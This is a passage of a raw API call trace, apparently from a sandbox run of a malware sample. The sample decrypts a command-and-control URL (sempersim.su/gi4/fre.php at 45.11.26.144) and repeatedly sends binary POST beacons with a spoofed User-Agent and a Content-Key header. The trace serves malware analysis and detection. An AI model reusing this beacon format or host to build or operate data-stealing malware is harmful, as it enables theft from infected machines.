out: hHeap=0x5b0000) returned 1 [0226.467] closesocket (s=0x344) returned 0 [0226.468] GetProcessHeap () returned 0x5b0000 [0226.468] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca910 | out: hHeap=0x5b0000) returned 1 [0226.468] GetProcessHeap () returned 0x5b0000 [0226.468] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0226.468] GetProcessHeap () returned 0x5b0000 [0226.469] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d34b8 | out: hHeap=0x5b0000) returned 1 [0226.469] GetProcessHeap () returned 0x5b0000 [0226.469] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0226.469] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x129c) returned 0x344 [0226.471] Sleep (dwMilliseconds=0xea60) [0226.484] GetProcessHeap () returned 0x5b0000 [0226.484] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3668 [0226.485] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0226.485] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0226.493] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0226.494] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0226.504] GetProcessHeap () returned 0x5b0000 [0226.504] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0226.505] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0226.505] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0226.506] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0226.506] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0226.507] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0226.507] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0226.507] GetProcessHeap () returned 0x5b0000 [0226.507] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0226.508] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0226.508] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3668, pdwDataLen=0xdfcfc | out: pbData=0x5d3668, pdwDataLen=0xdfcfc) returned 1 [0226.512] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0226.512] CryptDestroyKey (hKey=0x5bde08) returned 1 [0226.513] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0226.513] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0226.513] GetProcessHeap () returned 0x5b0000 [0226.513] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0226.514] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0226.514] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0226.554] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0226.555] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0226.555] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0226.555] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0226.556] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0226.557] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0226.557] GetProcessHeap () returned 0x5b0000 [0226.557] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb128 [0226.561] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0226.564] GetProcessHeap () returned 0x5b0000 [0226.564] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb128 | out: hHeap=0x5b0000) returned 1 [0226.564] GetProcessHeap () returned 0x5b0000 [0226.565] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0226.565] GetProcessHeap () returned 0x5b0000 [0226.565] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3668 | out: hHeap=0x5b0000) returned 1 [0226.565] GetProcessHeap () returned 0x5b0000 [0226.565] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3668 [0226.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0226.566] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0226.572] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0226.573] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5a20) returned 1 [0226.582] GetProcessHeap () returned 0x5b0000 [0226.582] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8560 [0226.583] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0226.583] CryptImportKey (in: hProv=0x5c5a20, pbData=0x5c8560, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0226.584] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0226.584] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0226.585] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0226.585] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0226.585] GetProcessHeap () returned 0x5b0000 [0226.586] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8560 | out: hHeap=0x5b0000) returned 1 [0226.587] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0226.587] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3668, pdwDataLen=0xdfcfc | out: pbData=0x5d3668, pdwDataLen=0xdfcfc) returned 1 [0226.588] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0226.588] CryptDestroyKey (hKey=0x5be288) returned 1 [0226.588] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0226.589] CryptReleaseContext (hProv=0x5c5a20, dwFlags=0x0) returned 1 [0226.589] GetProcessHeap () returned 0x5b0000 [0226.589] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0226.589] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0226.590] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0226.590] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0226.591] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0226.591] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0226.592] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0226.592] GetProcessHeap () returned 0x5b0000 [0226.592] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb100 [0226.592] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cd9d0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0226.596] GetProcessHeap () returned 0x5b0000 [0226.596] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca8b0 [0226.596] socket (af=2, type=1, protocol=6) returned 0x348 [0226.597] connect (s=0x348, name=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0226.689] FreeAddrInfoW (pAddrInfo=0x5cd9d0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0226.689] GetProcessHeap () returned 0x5b0000 [0226.689] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5888 [0226.689] GetProcessHeap () returned 0x5b0000 [0226.689] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0226.690] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0226.691] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0226.691] GetProcessHeap () returned 0x5b0000 [0226.691] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0226.691] GetProcessHeap () returned 0x5b0000 [0226.691] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0226.691] GetProcessHeap () returned 0x5b0000 [0226.691] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3110 [0226.691] GetProcessHeap () returned 0x5b0000 [0226.691] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0226.692] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0226.693] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0226.693] GetProcessHeap () returned 0x5b0000 [0226.693] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0226.693] GetProcessHeap () returned 0x5b0000 [0226.694] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0226.694] send (s=0x348, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0226.694] send (s=0x348, buf=0x5d1e18*, len=159, flags=0) returned 159 [0226.695] GetProcessHeap () returned 0x5b0000 [0226.695] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0226.695] recv (in: s=0x348, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0228.004] GetProcessHeap () returned 0x5b0000 [0228.005] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0228.005] GetProcessHeap () returned 0x5b0000 [0228.005] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3110 | out: hHeap=0x5b0000) returned 1 [0228.005] GetProcessHeap () returned 0x5b0000 [0228.006] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0228.006] GetProcessHeap () returned 0x5b0000 [0228.006] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5888 | out: hHeap=0x5b0000) returned 1 [0228.006] closesocket (s=0x348) returned 0 [0228.007] GetProcessHeap () returned 0x5b0000 [0228.007] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca8b0 | out: hHeap=0x5b0000) returned 1 [0228.007] GetProcessHeap () returned 0x5b0000 [0228.007] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0228.007] GetProcessHeap () returned 0x5b0000 [0228.007] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3668 | out: hHeap=0x5b0000) returned 1 [0228.007] GetProcessHeap () returned 0x5b0000 [0228.008] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb100 | out: hHeap=0x5b0000) returned 1 [0228.008] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x1298) returned 0x348 [0228.019] Sleep (dwMilliseconds=0xea60) [0228.043] GetProcessHeap () returned 0x5b0000 [0228.043] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2e40 [0228.043] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0228.044] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0228.052] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0228.053] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5e60) returned 1 [0228.059] GetProcessHeap () returned 0x5b0000 [0228.059] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84d0 [0228.060] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0228.060] CryptImportKey (in: hProv=0x5c5e60, pbData=0x5c84d0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0228.061] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0228.064] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0228.064] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0228.065] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0228.065] GetProcessHeap () returned 0x5b0000 [0228.065] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84d0 | out: hHeap=0x5b0000) returned 1 [0228.066] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0228.066] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2e40, pdwDataLen=0xdfcfc | out: pbData=0x5d2e40, pdwDataLen=0xdfcfc) returned 1 [0228.067] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0228.067] CryptDestroyKey (hKey=0x5be288) returned 1 [0228.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0228.068] CryptReleaseContext (hProv=0x5c5e60, dwFlags=0x0) returned 1 [0228.068] GetProcessHeap () returned 0x5b0000 [0228.068] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0228.069] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0228.070] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0228.070] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0228.070] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0228.071] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0228.072] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0228.072] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0228.075] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0228.075] GetProcessHeap () returned 0x5b0000 [0228.075] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0228.075] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0228.075] GetProcessHeap () returned 0x5b0000 [0228.076] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0228.076] GetProcessHeap () returned 0x5b0000 [0228.076] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0228.076] GetProcessHeap () returned 0x5b0000 [0228.076] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e40 | out: hHeap=0x5b0000) returned 1 [0228.077] GetProcessHeap () returned 0x5b0000 [0228.077] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d31e8 [0228.078] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0228.078] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0228.084] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0228.085] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0228.091] GetProcessHeap () returned 0x5b0000 [0228.091] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8560 [0228.092] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0228.092] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c8560, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0228.093] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0228.093] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0228.096] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0228.096] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0228.096] GetProcessHeap () returned 0x5b0000 [0228.096] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8560 | out: hHeap=0x5b0000) returned 1 [0228.097] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0228.097] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d31e8, pdwDataLen=0xdfcfc | out: pbData=0x5d31e8, pdwDataLen=0xdfcfc) returned 1 [0228.098] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0228.098] CryptDestroyKey (hKey=0x5bde08) returned 1 [0228.099] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0228.099] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0228.099] GetProcessHeap () returned 0x5b0000 [0228.100] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5d60 [0228.100] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0228.100] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0228.101] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0228.101] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0228.102] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0228.102] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0228.102] GetProcessHeap () returned 0x5b0000 [0228.102] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0228.102] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdca0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf3c8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0228.104] GetProcessHeap () returned 0x5b0000 [0228.104] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa60 [0228.104] socket (af=2, type=1, protocol=6) returned 0x34c [0228.104] connect (s=0x34c, name=0x5cf3c8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0228.175] FreeAddrInfoW (pAddrInfo=0x5cdca0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf3c8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0228.175] GetProcessHeap () returned 0x5b0000 [0228.175] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5dd8 [0228.176] GetProcessHeap () returned 0x5b0000 [0228.176] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0228.176] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0228.177] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0228.177] GetProcessHeap () returned 0x5b0000 [0228.177] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0228.177] GetProcessHeap () returned 0x5b0000 [0228.177] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0228.178] GetProcessHeap () returned 0x5b0000 [0228.178] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d34b8 [0228.178] GetProcessHeap () returned 0x5b0000 [0228.178] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0228.178] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0228.179] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0228.179] GetProcessHeap () returned 0x5b0000 [0228.179] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0228.179] GetProcessHeap () returned 0x5b0000 [0228.179] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0228.179] send (s=0x34c, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0228.180] send (s=0x34c, buf=0x5d1e18*, len=159, flags=0) returned 159 [0228.180] GetProcessHeap () returned 0x5b0000 [0228.180] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0228.180] recv (in: s=0x34c, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0229.516] GetProcessHeap () returned 0x5b0000 [0229.517] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0229.517] GetProcessHeap () returned 0x5b0000 [0229.517] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d34b8 | out: hHeap=0x5b0000) returned 1 [0229.517] GetProcessHeap () returned 0x5b0000 [0229.517] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0229.517] GetProcessHeap () returned 0x5b0000 [0229.517] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5dd8 | out: hHeap=0x5b0000) returned 1 [0229.517] closesocket (s=0x34c) returned 0 [0229.518] GetProcessHeap () returned 0x5b0000 [0229.518] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa60 | out: hHeap=0x5b0000) returned 1 [0229.518] GetProcessHeap () returned 0x5b0000 [0229.518] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5d60 | out: hHeap=0x5b0000) returned 1 [0229.518] GetProcessHeap () returned 0x5b0000 [0229.518] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d31e8 | out: hHeap=0x5b0000) returned 1 [0229.519] GetProcessHeap () returned 0x5b0000 [0229.519] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0229.519] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, 